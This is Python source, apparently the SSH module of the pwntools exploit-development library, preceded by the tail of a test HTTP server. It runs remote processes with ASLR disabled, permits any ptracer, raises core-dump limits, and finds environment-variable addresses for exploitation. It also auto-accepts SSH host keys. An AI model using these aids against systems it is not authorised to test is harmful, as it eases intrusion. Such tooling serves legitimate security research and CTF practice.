self.wfile.write(data[:send_batch])
start += send_batch
else:
target = os.path.abspath(os.path.join(self.data_path, url_path[1:]))
if os.path.isfile(target):
self.send_file(target, "application/x-binary")
else:
self.wfile.write('HTTP/1.1 404\r\nContent-Length: 0\r\n\r\n' )
def main(data_path="."):
logging.info("listen http on 8880")
httpd = HTTPServer(('', 8880), TestHttpServer, data_path)
http_thread = threading.Thread(target=httpd.serve_forever)
http_thread.setDaemon(True)
http_thread.start()
while True:
time.sleep(10)
if __name__ == "__main__":
if len(sys.argv) > 2:
data_path = sys.argv[1]
else:
data_path = "."
try:
main(data_path=data_path)
except Exception:
import traceback
traceback.print_exc(file=sys.stdout)
except KeyboardInterrupt:
sys.exit()
|
ssh.py | from __future__ import absolute_import
import inspect
import logging
import os
import re
import shutil
import string
import sys
import tarfile
import tempfile
import threading
import time
import types
from pwnlib import term
from pwnlib.context import context
from pwnlib.log import Logger
from pwnlib.log import getLogger
from pwnlib.term import text
from pwnlib.timeout import Timeout
from pwnlib.tubes.process import process
from pwnlib.tubes.sock import sock
from pwnlib.util import hashes
from pwnlib.util import misc
from pwnlib.util import safeeval
from pwnlib.util.sh_string import sh_string
# Kill the warning line:
# No handlers could be found for logger "paramiko.transport"
paramiko_log = logging.getLogger("paramiko.transport")
h = logging.StreamHandler(file('/dev/null','w+'))
h.setFormatter(logging.Formatter())
paramiko_log.addHandler(h)
class ssh_channel(sock):
#: Parent :class:`ssh` object
parent = None
#: Remote host
host = None
#: Return code, or :const:`None` if the process has not returned
#: Use :meth:`poll` to check.
returncode = None
#: :const:`True` if a tty was allocated for this channel
tty = False
#: Environment specified for the remote process, or :const:`None`
#: if the default environment was used
env = None
#: Command specified for the constructor
process = None
def __init__(self, parent, process = None, tty = False, wd = None, env = None, raw = True, *args, **kwargs):
super(ssh_channel, self).__init__(*args, **kwargs)
# keep the parent from being garbage collected in some cases
self.parent = parent
self.returncode = None
self.host = parent.host
self.tty = tty
self.env = env
self.process = process
self.cwd = wd or '.'
env = env or {}
msg = 'Opening new channel: %r' % (process or 'shell')
if isinstance(process, (list, tuple)):
process = ' '.join(sh_string(s) for s in process)
if process and wd:
process = 'cd %s >/dev/null 2>&1;%s' % (sh_string(wd), process)
if process and env:
for name, value in env.items():
if not re.match('^[a-zA-Z_][a-zA-Z0-9_]*$', name):
self.error('run(): Invalid environment key $r' % name)
process = 'export %s=%s;%s' % (name, sh_string(value), process)
if process and tty:
if raw:
process = 'stty raw -ctlecho -echo; ' + process
else:
process = 'stty -ctlecho -echo; ' + process
# If this object is enabled for DEBUG-level logging, don't hide
# anything about the command that's actually executed.
if process and self.isEnabledFor(logging.DEBUG):
msg = 'Opening new channel: %r' % ((process,) or 'shell')
with self.waitfor(msg) as h:
import paramiko
try:
self.sock = parent.transport.open_session()
except paramiko.ChannelException as e:
if e.args == (1, 'Administratively prohibited'):
self.error("Too many sessions open! Use ssh_channel.close() or 'with'!")
raise e
if self.tty:
self.sock.get_pty('xterm', term.width, term.height)
def resizer():
if self.sock:
try:
self.sock.resize_pty(term.width, term.height)
except paramiko.ssh_exception.SSHException:
pass
self.resizer = resizer
term.term.on_winch.append(self.resizer)
else:
self.resizer = None
# Put stderr on stdout. This might not always be desirable,
# but our API does not support multiple streams
self.sock.set_combine_stderr(True)
self.settimeout(self.timeout)
if process:
self.sock.exec_command(process)
else:
self.sock.invoke_shell()
h.success()
def kill(self):
"""kill()
Kills the process.
"""
self.close()
def recvall(self, timeout = sock.forever):
# We subclass tubes.sock which sets self.sock to None.
#
# However, we need to wait for the return value to propagate,
# which may not happen by the time .close() is called by tube.recvall()
tmp_sock = self.sock
timeout = self.maximum if self.timeout is self.forever else self.timeout
data = super(ssh_channel, self).recvall(timeout)
# Restore self.sock to be able to call wait()
self.sock = tmp_sock
self.wait()
# Again set self.sock to None
self.sock = None
return data
def wait(self):
return self.poll(block=True)
def poll(self, block=False):
"""poll() -> int
Poll the exit code of the process. Will return None, if the
process has not yet finished and the exit code otherwise.
"""
if self.returncode == None and self.sock \
and (block or self.sock.exit_status_ready()):
while not self.sock.status_event.is_set():
self.sock.status_event.wait(0.05)
self.returncode = self.sock.recv_exit_status()
return self.returncode
def can_recv_raw(self, timeout):
with self.countdown(timeout):
while self.countdown_active():
if self.sock.recv_ready():
return True
time.sleep(min(self.timeout, 0.05))
return False
def interactive(self, prompt = term.text.bold_red('$') + ' '):
"""interactive(prompt = pwnlib.term.text.bold_red('$') + ' ')
If not in TTY-mode, this does exactly the same as
meth:`pwnlib.tubes.tube.tube.interactive`, otherwise
it does mostly the same.
An SSH connection in TTY-mode will typically supply its own prompt,
thus the prompt argument is ignored in this case.
We also have a few SSH-specific hacks that will ideally be removed
once the :mod:`pwnlib.term` is more mature.
"""
# If we are only executing a regular old shell, we need to handle
# control codes (specifically Ctrl+C).
#
# Otherwise, we can just punt to the default implementation of interactive()
if self.process is not None:
return super(ssh_channel, self).interactive(prompt)
self.info('Switching to interactive mode')
# We would like a cursor, please!
term.term.show_cursor()
event = threading.Event()
def recv_thread(event):
while not event.is_set():
try:
cur = self.recv(timeout = 0.05)
cur = cur.replace('\r\n','\n')
cur = cur.replace('\r','')
if cur == None:
continue
elif cur == '\a':
# Ugly hack until term unstands bell characters
continue
sys.stdout.write(cur)
sys.stdout.flush()
except EOFError:
self.info('Got EOF while reading in interactive')
event.set()
break
t = context.Thread(target = recv_thread, args = (event,))
t.daemon = True
t.start()
while not event.is_set():
if term.term_mode:
try:
data = term.key.getraw(0.1)
except KeyboardInterrupt:
data = [3] # This is ctrl-c
except IOError:
if not event.is_set():
raise
else:
data = sys.stdin.read(1)
if not data:
event.set()
else:
data = [ord(data)]
if data:
try:
self.send(''.join(chr(c) for c in data))
except EOFError:
event.set()
self.info('Got EOF while sending in interactive')
while t.is_alive():
t.join(timeout = 0.1)
# Restore
term.term.hide_cursor()
def close(self):
self.poll()
while self.resizer in term.term.on_winch:
term.term.on_winch.remove(self.resizer)
super(ssh_channel, self).close()
def spawn_process(self, *args, **kwargs):
self.error("Cannot use spawn_process on an SSH channel.""")
def _close_msg(self):
self.info('Closed SSH channel with %s' % self.host)
class ssh_process(ssh_channel):
#: Working directory
cwd = None
#: PID of the process
#: Only valid when instantiated through :meth:`ssh.process`
pid = None
#: Executable of the procesks
#: Only valid when instantiated through :meth:`ssh.process`
executable = None
#: Arguments passed to the process
#: Only valid when instantiated through :meth:`ssh.process`
argv = None
def libs(self):
"""libs() -> dict
Returns a dictionary mapping the address of each loaded library in the
process's address space.
If ``/proc/$PID/maps`` cannot be opened, the output of ldd is used
verbatim, which may be different than the actual addresses if ASLR
is enabled.
"""
maps = self.parent.libs(self.executable)
maps_raw = self.parent.cat('/proc/%d/maps' % self.pid)
for lib in maps:
remote_path = lib.split(self.parent.host)[-1]
for line in maps_raw.splitlines():
if line.endswith(remote_path):
address = line.split('-')[0]
maps[lib] = int(address, 16)
break
return maps
@property
def libc(self):
"""libc() -> ELF
Returns an ELF for the libc for the current process.
If possible, it is adjusted to the correct address
automatically.
"""
from pwnlib.elf import ELF
for lib, address in self.libs().items():
if 'libc.so' in lib:
e = ELF(lib)
e.address = address
return e
@property
def elf(self):
"""elf() -> pwnlib.elf.elf.ELF
Returns an ELF file for the executable that launched the process.
"""
import pwnlib.elf.elf
libs = self.parent.libs(self.executable)
for lib in libs:
# Cannot just check "executable in lib", see issue #1047
if lib.endswith(self.executable):
return pwnlib.elf.elf.ELF(lib)
@property
def corefile(self):
import pwnlib.elf.corefile
finder = pwnlib.elf.corefile.CorefileFinder(self)
if not finder.core_path:
self.error("Could not find core file for pid %i" % self.pid)
return pwnlib.elf.corefile.Corefile(finder.core_path)
def getenv(self, variable, **kwargs):
"""Retrieve the address of an environment variable in the remote process.
"""
argv0 = self.argv[0]
script = ';'.join(('from ctypes import *',
'import os',
'libc = CDLL("libc.so.6")',
'print os.path.realpath(%r)' % self.executable,
'print(libc.getenv(%r))' % variable,))
try:
with context.local(log_level='error'):
python = self.parent.which('python')
if not python:
self.error("Python is not installed on the remote system.")
io = self.parent.process([argv0,'-c', script.strip()],
executable=python,
env=self.env,
**kwargs)
path = io.recvline()
address = int(io.recvline())
address -= len(python)
address += len(path)
return int(address) & context.mask
except:
self.exception("Could not look up environment variable %r" % variable)
def _close_msg(self):
# If we never completely started up, just use the parent implementation
if self.executable is None:
return super(ssh_process, self)._close_msg()
self.info('Stopped remote process %r on %s (pid %i)' \
% (os.path.basename(self.executable),
self.host,
self.pid))
class ssh_connecter(sock):
def __init__(self, parent, host, port, *a, **kw):
super(ssh_connecter, self).__init__(*a, **kw)
# keep the parent from being garbage collected in some cases
self.parent = parent
self.host = parent.host
self.rhost = host
self.rport = port
msg = 'Connecting to %s:%d via SSH to %s' % (self.rhost, self.rport, self.host)
with self.waitfor(msg) as h:
try:
self.sock = parent.transport.open_channel('direct-tcpip', (host, port), ('127.0.0.1', 0))
except Exception as e:
self.exception(e.message)
raise
sockname = self.sock.get_transport().sock.getsockname()
self.lhost = sockname[0]
self.lport = sockname[1]
h.success()
def spawn_process(self, *args, **kwargs):
self.error("Cannot use spawn_process on an SSH channel.""")
def _close_msg(self):
self.info("Closed remote connection to %s:%d via SSH connection to %s" % (self.rhost, self.rport, self.host))
class ssh_listener(sock):
def __init__(self, parent, bind_address, port, *a, **kw):
super(ssh_listener, self).__init__(*a, **kw)
# keep the parent from being garbage collected in some cases
self.parent = parent
self.host = parent.host
try:
self.port = parent.transport.request_port_forward(bind_address, port)
except Exception:
h.failure('Failed create a port forwarding')
raise
def accepter():
msg = 'Waiting on port %d via SSH to %s' % (self.port, self.host)
h = self.waitfor(msg)
try:
self.sock = parent.transport.accept()
parent.transport.cancel_port_forward(bind_address, self.port)
except Exception:
self.sock = None
h.failure()
self.exception('Failed to get a connection')
return
self.rhost, self.rport = self.sock.origin_addr
h.success('Got connection from %s:%d' % (self.rhost, self.rport))
self._accepter = context.Thread(target = accepter)
self._accepter.daemon = True
self._accepter.start()
def _close_msg(self):
self.info("Closed remote connection to %s:%d via SSH listener on port %d via %s" % (self.rhost, self.rport, self.port, self.host))
def spawn_process(self, *args, **kwargs):
self.error("Cannot use spawn_process on an SSH channel.""")
def wait_for_connection(self):
"""Blocks until a connection has been established."""
_ = self.sock
return self
def __getattr__(self, key):
if key == 'sock':
while self._accepter.is_alive():
self._accepter.join(timeout = 0.1)
return self.sock
else:
return getattr(super(ssh_listener, self), key)
class ssh(Timeout, Logger):
#: Remote host name (``str``)
host = None
#: Remote port (``int``)
port = None
#: Working directory (``str``)
cwd = None
#: Enable caching of SSH downloads (``bool``)
cache = True
#: Paramiko SSHClient which backs this object
client = None
#: Paramiko SFTPClient object which is used for file transfers.
#: Set to :const:`None` to disable ``sftp``.
sftp = None
#: PID of the remote ``sshd`` process servicing this connection.
pid = None
def __init__(self, user, host, port = 22, password = None, key = None,
keyfile = None, proxy_command = None, proxy_sock = None,
level = None, cache = True, ssh_agent = False, *a, **kw):
"""Creates a new ssh connection.
Arguments:
user(str): The username to log in with
host(str): The hostname to connect to
port(int): The port to connect to
password(str): Try to authenticate using this password
key(str): Try to authenticate using this private key. The string should be the actual private key.
keyfile(str): Try to authenticate using this private key. The string should be a filename.
proxy_command(str): Use this as a proxy command. It has approximately the same semantics as ProxyCommand from ssh(1).
proxy_sock(str): Use this socket instead of connecting to the host.
timeout: Timeout, in seconds
level: Log level
cache: Cache downloaded files (by hash/size/timestamp)
ssh_agent: If :const:`True`, enable usage of keys via ssh-agent
NOTE: The proxy_command and proxy_sock arguments is only available if a
fairly new version of paramiko is used."""
super(ssh, self).__init__(*a, **kw)
Logger.__init__(self)
if level is not None:
self.setLevel(level)
self.host = host
self.port = port
self.user = user
self.password = password
self.key = key
self.keyfile = keyfile
self._cachedir = os.path.join(tempfile.gettempdir(), 'pwntools-ssh-cache')
self.cwd = '.'
self.cache = cache
# Deferred attributes
self._platform_info = {}
self._aslr = None
self._aslr_ulimit = None
misc.mkdir_p(self._cachedir)
# This is a dirty hack to make my Yubikey shut up.
# If anybody has a problem with this, please open a bug and I'll
# figure out a better workaround.
if not ssh_agent:
os.environ.pop('SSH_AUTH_SOCK', None)
import paramiko
# Make a basic attempt to parse the ssh_config file
try:
config_file = os.path.expanduser('~/.ssh/config')
if os.path.exists(config_file):
ssh_config = paramiko.SSHConfig()
ssh_config.parse(file(config_file))
host_config = ssh_config.lookup(host)
if 'hostname' in host_config:
self.host = host = host_config['hostname']
if not keyfile and 'identityfile' in host_config:
keyfile = host_config['identityfile'][0]
if keyfile.lower() == 'none':
keyfile = None
except Exception as e:
self.debug("An error occurred while parsing ~/.ssh/config:\n%s" % e)
keyfiles = [os.path.expanduser(keyfile)] if keyfile else []
msg = 'Connecting to %s on port %d' % (host, port)
with self.waitfor(msg) as h:
self.client = paramiko.SSHClient()
self.client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
known_hosts = os.path.expanduser('~/.ssh/known_hosts')
if os.path.exists(known_hosts):
self.client.load_host_keys(known_hosts)
has_proxy = (proxy_sock or proxy_command) and True
if has_proxy:
if 'ProxyCommand' not in dir(paramiko):
self.error('This version of paramiko does not support proxies.')
if proxy_sock and proxy_command:
self.error('Cannot have both a proxy command and a proxy sock')
if proxy_command:
proxy_sock = paramiko.ProxyCommand(proxy_command)
self.client.connect(host, port, user, password, key, keyfiles, self.timeout, compress = True, sock = proxy_sock)
else:
self.client.connect(host, port, user, password, key, keyfiles, self.timeout, compress = True)
self.transport = self.client.get_transport()
self.transport.use_compression(True)
h.success()
self._tried_sftp = False
with context.local(log_level='error'):
def getppid():
import os
print(os.getppid())
try:
self.pid = int(self.process('false', preexec_fn=getppid).recvall())
except Exception:
self.pid = None
try:
self.info_once(self.checksec())
except Exception:
self.warn_once("Couldn't check security settings on %r" % self.host)
@property
def sftp(self):
if not self._tried_sftp:
try:
self._sftp = self.transport.open_sftp_client()
except Exception:
self._sftp = None
self._tried_sftp = True
return self._sftp
@sftp.setter
def sftp(self, value):
self._sftp = value
self._tried_sftp = True
def __enter__(self, *a):
return self
def __exit__(self, *a, **kw):
self.close()
def shell(self, shell = None, tty = True, timeout = Timeout.default):
"""shell(shell = None, tty = True, timeout = Timeout.default) -> ssh_channel
Open a new channel with a shell inside.
Arguments:
shell(str): Path to the shell program to run.
If :const:`None`, uses the default shell for the logged in user.
tty(bool): If :const:`True`, then a TTY is requested on the remote server.
Returns:
Return a :class:`pwnlib.tubes.ssh.ssh_channel` object.
Examples:
>>> s = ssh(host='example.pwnme',
... user='travis',
... password='demopass')
>>> sh = s.shell('/bin/sh')
>>> sh.sendline('echo Hello; exit')
>>> print 'Hello' in sh.recvall()
True
"""
return self.run(shell, tty, timeout = timeout)
def process(self, argv=None, executable=None, tty=True, cwd=None, env=None, timeout=Timeout.default, run=True,
stdin=0, stdout=1, stderr=2, preexec_fn=None, preexec_args=[], raw=True, aslr=None, setuid=None,
shell=False):
r"""
Executes a process on the remote server, in the same fashion
as pwnlib.tubes.process.process.
To achieve this, a Python script is created to call ``os.execve``
with the appropriate arguments.
As an added bonus, the ``ssh_channel`` object returned has a
``pid`` property for the process pid.
Arguments:
argv(list):
List of arguments to pass into the process
executable(str):
Path to the executable to run.
If :const:`None`, ``argv[0]`` is used.
tty(bool):
Request a `tty` from the server. This usually fixes buffering problems
by causing `libc` to write data immediately rather than buffering it.
However, this disables interpretation of control codes (e.g. Ctrl+C)
and breaks `.shutdown`.
cwd(str):
Working directory. If :const:`None`, uses the working directory specified
on :attr:`cwd` or set via :meth:`set_working_directory`.
env(dict):
Environment variables to set in the child. If :const:`None`, inherits the
default environment.
timeout(int):
Timeout to set on the `tube` created to interact with the process.
run(bool):
Set to :const:`True` to run the program (default).
If :const:`False`, returns the path to an executable Python script on the
remote server which, when executed, will do it.
stdin(int, str):
If an integer, replace stdin with the numbered file descriptor.
If a string, a open a file with the specified path and replace
stdin with its file descriptor. May also be one of ``sys.stdin``,
``sys.stdout``, ``sys.stderr``. If :const:`None`, the file descriptor is closed.
stdout(int, str):
See ``stdin``.
stderr(int, str):
See ``stdin``.
preexec_fn(callable):
Function which is executed on the remote side before execve().
This **MUST** be a self-contained function -- it must perform
all of its own imports, and cannot refer to variables outside
its scope.
preexec_args(object):
Argument passed to ``preexec_fn``.
This **MUST** only consist of native Python objects.
raw(bool):
If :const:`True`, disable TTY control code interpretation.
aslr(bool):
See :class:`pwnlib.tubes.process.process` for more information.
setuid(bool):
See :class:`pwnlib.tubes.process.process` for more information.
shell(bool):
Pass the command-line arguments to the shell.
Returns:
A new SSH channel, or a path to a script if ``run=False``.
Notes:
Requires Python on the remote server.
Examples:
>>> s = ssh(host='example.pwnme',
... user='travis',
... password='demopass')
>>> sh = s.process('/bin/sh', env={'PS1':''})
>>> sh.sendline('echo Hello; exit')
>>> sh.recvall()
'Hello\n'
>>> s.process(['/bin/echo', '\xff']).recvall()
'\xff\n'
>>> s.process(['readlink', '/proc/self/exe']).recvall()
'/bin/readlink\n'
>>> s.process(['LOLOLOL', '/proc/self/exe'], executable='readlink').recvall()
'/bin/readlink\n'
>>> s.process(['LOLOLOL\x00', '/proc/self/cmdline'], executable='cat').recvall()
'LOLOLOL\x00/proc/self/cmdline\x00'
>>> sh = s.process(executable='/bin/sh')
>>> sh.pid in pidof('sh') # doctest: +SKIP
True
>>> s.process(['pwd'], cwd='/tmp').recvall()
'/tmp\n'
>>> p = s.process(['python','-c','import os; print os.read(2, 1024)'], stderr=0)
>>> p.send('hello')
>>> p.recv()
'hello\n'
>>> s.process(['/bin/echo', 'hello']).recvall()
'hello\n'
>>> s.process(['/bin/echo', 'hello'], stdout='/dev/null').recvall()
''
>>> s.process(['/usr/bin/env'], env={}).recvall()
''
>>> s.process('/usr/bin/env', env={'A':'B'}).recvall()
'A=B\n'
>>> s.process('false', preexec_fn=1234)
Traceback (most recent call last):
...
PwnlibException: preexec_fn must be a function
>>> s.process('false', preexec_fn=lambda: 1234)
Traceback (most recent call last):
...
PwnlibException: preexec_fn cannot be a lambda
>>> def uses_globals():
... foo = bar
>>> print s.process('false', preexec_fn=uses_globals).recvall().strip() # doctest: +ELLIPSIS
Traceback (most recent call last):
...
NameError: global name 'bar' is not defined
>>> s.process('echo hello', shell=True).recvall()
'hello\n'
"""
if not argv and not executable:
self.error("Must specify argv or executable")
argv = argv or []
aslr = aslr if aslr is not None else context.aslr
if isinstance(argv, (str, unicode)):
argv = [argv]
if not isinstance(argv, (list, tuple)):
self.error('argv must be a list or tuple')
if shell:
if len(argv) != 1:
self.error('Cannot provide more than 1 argument if shell=True')
argv = ['/bin/sh', '-c'] + argv
# Python doesn't like when an arg in argv contains '\x00'
# -> execve() arg 2 must contain only strings
for i, arg in enumerate(argv):
if '\x00' in arg[:-1]:
self.error('Inappropriate nulls in argv[%i]: %r' % (i, arg))
argv[i] = arg.rstrip('\x00')
# Python also doesn't like when envp contains '\x00'
if env and hasattr(env, 'items'):
for k, v in env.items():
if '\x00' in k[:-1]:
self.error('Inappropriate nulls in environment key %r' % k)
if '\x00' in v[:-1]:
self.error('Inappropriate nulls in environment value %r=%r' % (k, v))
env[k.rstrip('\x00')] = v.rstrip('\x00')
executable = executable or argv[0]
cwd = cwd or self.cwd
# Validate, since failures on the remote side will suck.
if not isinstance(executable, str):
self.error("executable / argv[0] must be a string: %r" % executable)
if not isinstance(argv, (list, tuple)):
self.error("argv must be a list or tuple: %r" % argv)
if env is not None and not isinstance(env, dict) and env != os.environ:
self.error("env must be a dict: %r" % env)
if not all(isinstance(s, str) for s in argv):
self.error("argv must only contain strings: %r" % argv)
# Allow passing in sys.stdin/stdout/stderr objects
handles = {sys.stdin: 0, sys.stdout:1, sys.stderr:2}
stdin = handles.get(stdin, stdin)
stdout = handles.get(stdout, stdout)
stderr = handles.get(stderr, stderr)
# Allow the user to provide a self-contained function to run
def func(): pass
func = preexec_fn or func
func_args = preexec_args
if not isinstance(func, types.FunctionType):
self.error("preexec_fn must be a function")
func_name = func.__name__
if func_name == (lambda: 0).__name__:
self.error("preexec_fn cannot be a lambda")
func_src = inspect.getsource(func).strip()
setuid = True if setuid is None else bool(setuid)
script = r"""
#!/usr/bin/env python2
import os, sys, ctypes, resource, platform, stat
from collections import OrderedDict
exe = %(executable)r
argv = %(argv)r
env = %(env)r
os.chdir(%(cwd)r)
if env is not None:
os.environ.clear()
os.environ.update(env)
else:
env = os.environ
def is_exe(path):
return os.path.isfile(path) and os.access(path, os.X_OK)
PATH = os.environ.get('PATH','').split(os.pathsep)
if os.path.sep not in exe and not is_exe(exe):
for path in PATH:
test_path = os.path.join(path, exe)
if is_exe(test_path):
exe = test_path
break
if not is_exe(exe):
sys.stderr.write('3\n')
sys.stderr.write("{} is not executable or does not exist in $PATH: {}".format(exe,PATH))
sys.exit(-1)
if not %(setuid)r:
PR_SET_NO_NEW_PRIVS = 38
result = ctypes.CDLL('libc.so.6').prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0)
if result != 0:
sys.stdout.write('3\n')
sys.stdout.write("Could not disable setuid: prctl(PR_SET_NO_NEW_PRIVS) failed")
sys.exit(-1)
try:
PR_SET_PTRACER = 0x59616d61
PR_SET_PTRACER_ANY = -1
ctypes.CDLL('libc.so.6').prctl(PR_SET_PTRACER, PR_SET_PTRACER_ANY, 0, 0, 0)
except Exception:
pass
# Determine what UID the process will execute as
# This is used for locating apport core dumps
suid = os.getuid()
sgid = os.getgid()
st = os.stat(exe)
if %(setuid)r:
if (st.st_mode & stat.S_ISUID):
suid = st.st_uid
if (st.st_mode & stat.S_ISGID):
sgid = st.st_gid
if sys.argv[-1] == 'check':
sys.stdout.write("1\n")
sys.stdout.write(str(os.getpid()) + "\n")
sys.stdout.write(str(os.getuid()) + "\n")
sys.stdout.write(str(os.getgid()) + "\n")
sys.stdout.write(str(suid) + "\n")
sys.stdout.write(str(sgid) + "\n")
sys.stdout.write(os.path.realpath(exe) + '\x00')
sys.stdout.flush()
for fd, newfd in {0: %(stdin)r, 1: %(stdout)r, 2:%(stderr)r}.items():
if newfd is None:
close(fd)
elif isinstance(newfd, str):
os.close(fd)
os.open(newfd, os.O_RDONLY if fd == 0 else (os.O_RDWR|os.O_CREAT))
elif isinstance(newfd, int) and newfd != fd:
os.dup2(fd, newfd)
if not %(aslr)r:
if platform.system().lower() == 'linux' and %(setuid)r is not True:
ADDR_NO_RANDOMIZE = 0x0040000
ctypes.CDLL('libc.so.6').personality(ADDR_NO_RANDOMIZE)
resource.setrlimit(resource.RLIMIT_STACK, (-1, -1))
# Attempt to dump ALL core file regions
try:
with open('/proc/self/coredump_filter', 'w') as core_filter:
core_filter.write('0x3f\n')
except Exception:
pass
# Assume that the user would prefer to have core dumps.
try:
resource.setrlimit(resource.RLIMIT_CORE, (-1, -1))
except Exception:
pass
%(func_src)s
apply(%(func_name)s, %(func_args)r)
os.execve(exe, argv, env)
""" % locals()
script = script.strip()
self.debug("Created execve script:\n" + script)
if not run:
with context.local(log_level='error'):
tmpfile = self.mktemp('-t', 'pwnlib-execve-XXXXXXXXXX')
self.chmod('+x', tmpfile)
self.info("Uploading execve script to %r" % tmpfile)
self.upload_data(script, tmpfile)
return tmpfile
if self.isEnabledFor(logging.DEBUG):
execve_repr = "execve(%r, %s, %s)" % (executable,
argv,
'os.environ'
if (env in (None, os.environ))
else env)
# Avoid spamming the screen
if self.isEnabledFor(logging.DEBUG) and len(execve_repr) > 512:
execve_repr = execve_repr[:512] + '...'
else:
execve_repr = repr(executable)
msg = 'Starting remote process %s on %s' % (execve_repr, self.host)
with self.progress(msg) as h:
script = 'for py in python2.7 python2 python; do test -x "$(which $py 2>&1)" && exec $py -c %s check; done; echo 2' % sh_string(script)
with context.local(log_level='error'):
python = ssh_process(self, script, tty=True, raw=True, level=self.level, timeout=self.timeout)
try:
result = safeeval.const(python.recvline())
except Exception:
h.failure("Process creation failed")
self.warn_once('Could not find a Python2 interpreter on %s\n' % self.host \
+ "Use ssh.run() instead of ssh.process()")
return None
# If an error occurred, try to grab as much output
# as we can.
if result != 1:
error_message = python.recvrepeat(timeout=1)
if result == 0:
self.error("%r does not exist or is not executable" % executable)
elif result == 3:
self.error(error_message)
elif result == 2:
self.error("python is not installed on the remote system %r" % self.host)
elif result != 1:
h.failure("something bad happened:\n%s" % error_message)
python.pid = safeeval.const(python.recvline())
python.uid = safeeval.const(python.recvline())
python.gid = safeeval.const(python.recvline())
python.suid = safeeval.const(python.recvline())
python.sgid = safeeval.const(python.recvline())
python.argv = argv
python.executable = python.recvuntil('\x00')[:-1]
h.success('pid %i' % python.pid)
if aslr == False and setuid and (python.uid != python.suid or python.gid != python.sgid):
effect = "partial" if self.aslr_ulimit else "no"
message = "Specfied aslr=False on setuid binary %s\n" % python.executable
message += "This will have %s effect. Add setuid=False to disable ASLR for debugging.\n" % effect
if self.aslr_ulimit:
message += "Unlimited stack size should de-randomize shared libraries."
self.warn_once(message)
elif not aslr:
self.warn_once("ASLR is disabled for %r!" % python.executable)
return python
def which(self, program):
"""which(program) -> str
Minor modification to just directly invoking ``which`` on the remote
system which adds the current working directory to the end of ``$PATH``.
"""
# If name is a path, do not attempt to resolve it.
if os.path.sep in program:
return program
result = self.run('export PATH=$PATH:$PWD; which %s' % program).recvall().strip()
if ('/%s' % program) not in result:
return None
return result
def system(self, process, tty = True, wd = None, env = None, timeout = None, raw = True):
r"""system(process, tty = True, wd = None, env = None, timeout = Timeout.default, raw = True) -> ssh_channel
Open a new channel with a specific process inside. If `tty` is True,
then a TTY is requested on the remote server.
If `raw` is True, terminal control codes are ignored and input is not
echoed back.
Return a :class:`pwnlib.tubes.ssh.ssh_channel` object.
Examples:
>>> s = ssh(host='example.pwnme',
... user='travis',
... password='demopass')
>>> py = s.run('python -i')
>>> _ = py.recvuntil('>>> ')
>>> py.sendline('print 2+2')
>>> py.sendline('exit')
>>> print repr(py.recvline())
'4\n'
"""
if wd is None:
wd = self.cwd
if timeout is None:
timeout = self.timeout
return ssh_channel(self, process, tty, wd, env, timeout = timeout, level = self.level, raw = raw)
#: Backward compatibility. Use :meth:`system`
run = system
def getenv(self, variable, **kwargs):
"""Retrieve the address of an environment variable on the remote
system.
Note:
The exact address will differ based on what other environment
variables are set, as well as argv[0]. In order to ensure that
the path is *exactly* the same, it is recommended to invoke the
process with ``argv=[]``.
"""
script = '''
from ctypes import *; libc = CDLL('libc.so.6'); print(libc.getenv(%r))
''' % variable
with context.local(log_level='error'):
python = self.which('python')
if not python:
self.error("Python is not installed on the remote system.")
io = self.process(['','-c', script.strip()], executable=python, **kwargs)
result = io.recvall()
try:
return int(result) & context.mask
except:
self.exception("Could not look up environment variable %r" % variable)
def run_to_end(self, process, tty = False, wd = None, env = None):
r"""run_to_end(process, tty = False, timeout = Timeout.default, env = None) -> str
Run a command on the remote server and return a tuple with
(data, exit_status). If `tty` is True, then the command is run inside
a TTY on the remote server.
Examples:
>>> s = ssh(host='example.pwnme',
... user='travis',
... password='demopass')
>>> print s.run_to_end('echo Hello; exit 17')
('Hello\n', 17)
"""
with context.local(log_level = 'ERROR'):
c = self.run(process, tty, wd = wd, timeout = Timeout.default)
data = c.recvall()
retcode = c.wait()
c.close()
return data, retcode
def connect_remote(self, host, port, timeout = Timeout.default):
r"""connect_remote(host, port, timeout = Timeout.default) -> ssh_connecter
Connects to a host through an SSH connection. This is equivalent to
using the ``-L`` flag on ``ssh``.
Returns a :class:`pwnlib.tubes.ssh.ssh_connecter` object.
Examples:
>>> from pwn import *
>>> l = listen()
>>> s = ssh(host='example.pwnme',
... user='travis',
... password='demopass')
>>> a = s.connect_remote(s.host, l.lport)
>>> b = l.wait_for_connection()
>>> a.sendline('Hello')
>>> print repr(b.recvline())
'Hello\n'
"""
return ssh_connecter(self, host, port, timeout, level=self.level)
remote = connect_remote
def listen_remote(self, port = 0, bind_address = '', timeout = Timeout.default):
r"""listen_remote(port = 0, bind_address = '', timeout = Timeout.default) -> ssh_connecter
Listens remotely through an SSH connection. This is equivalent to
using the ``-R`` flag on ``ssh``.
Returns a :class:`pwnlib.tubes.ssh.ssh_listener` object.
Examples:
>>> from pwn import *
>>> s = ssh(host='example.pwnme',
... user='travis',
... password='demopass')
>>> l = s.listen_remote()
>>> a = remote(s.host, l.port)
>>> b = l.wait_for_connection()
>>> a.sendline('Hello')
>>> print repr(b.recvline())
'Hello\n'
"""
return ssh_listener(self, bind_address, port, timeout, level=self.level)
listen = listen_remote
def __getitem__(self, attr):
"""Permits indexed access to run commands over SSH
Examples:
>>> s = ssh(host='example.pwnme',
... user='travis',
... password='demopass')
>>> print s['echo hello']
hello
"""
return self.__getattr__(attr)()
def __call__(self, attr):
"""Permits function-style access to run commands over SSH
Examples:
>>> s = ssh(host='example.pwnme',
... user='travis',
... password='demopass')
>>> print repr(s('echo hello'))
'hello'
"""
return self.__getattr__(attr)()
def __getattr__(self, attr):
"""Permits member access to run commands over SSH
Examples:
>>> s = ssh(host='example.pwnme',
... user='travis',
... password='demopass')
>>> s.echo('hello')
'hello'
>>> s.whoami()
'travis'
>>> s.echo(['huh','yay','args'])
'huh yay args'
"""
bad_attrs = [
'trait_names', # ipython tab-complete
]
if attr in self.__dict__ \
or attr in bad_attrs \
or attr.startswith('_'):
raise AttributeError
def runner(*args):
if len(args) == 1 and isinstance(args[0], (list, tuple)):
command = [attr] + args[0]
else:
command = ' '.join((attr,) + args)
return self.run(command).recvall().strip()
return runner
def connected(self):
"""Returns True if we are connected.
Example:
>>> s = ssh(host='example.pwnme',
... user='travis',
... password='demopass')
>>> s.connected()
True
>>> s.close()
>>> s.connected()
False
"""
return bool(self.client and self.client.get_transport().is_active())
def close(self):
"""Close the connection."""
if self.client:
self.client.close()
self.client = None
